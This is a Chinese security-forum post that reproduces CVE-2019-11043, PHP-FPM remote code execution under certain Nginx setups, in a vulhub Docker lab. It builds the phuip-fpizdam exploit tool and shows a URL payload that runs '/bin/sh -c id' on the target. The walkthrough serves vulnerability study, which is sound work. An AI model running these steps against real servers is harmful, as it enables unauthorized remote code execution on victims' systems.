查看: 13448|回复: 0

[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行

[复制链接]
  • TA的每日心情
    奋斗
    2024-1-11 16:11
  • 签到天数: 426 天

    [LV.9]以坛为家II

    发表于 2019-10-25 23:53:09 | 显示全部楼层 |阅读模式
    本帖最后由 Te5tB99 于 2019-10-25 23:55 编辑

    环境准备
    可以使用vulhub的环境
    先在本地创建一个名为CVE-2019-11043的文件夹,再创建一个名为www的文件夹
    在CVE-2019-11043文件夹下执行如下命令

    wget https://raw.githubusercontent.co ... -11043/default.conf
    wget https://raw.githubusercontent.co ... /docker-compose.yml
    在CVE-2019-11043/www文件夹下执行如下命令

    wget https://raw.githubusercontent.co ... 11043/www/index.php
    下载完成三个文件以后,在CVE-2019-11043文件夹下执行如下命令启动环境

    service docker start
    docker-compose up -d
    随后访问http://ip:8080/index.php即可

    工具准备
    访问https://github.com/neex/phuip-fpizdam,clone到本地以后,执行如下命令(将根据OS自动生成对应的OS版本)

    go build


    即可生成phuip-fpizdam工具

    漏洞复现
    使用./phuip-fpizdam http://ip:8080/index.php攻击漏洞环境



    随后访问http://ip:8080/index.php?a=/bin/sh+-c%20%27id%27&即可




    按照步骤已成功在mac上复现,但因涉及环境及服务较多,复现结果以实际为准;建议大家在linux系统复现。


    该文章转自亚信科技 清水 川崎 @shimizukawasaki的qiita文章。
    原文链接点我阅读原文
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 08:34 , Processed in 0.020510 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部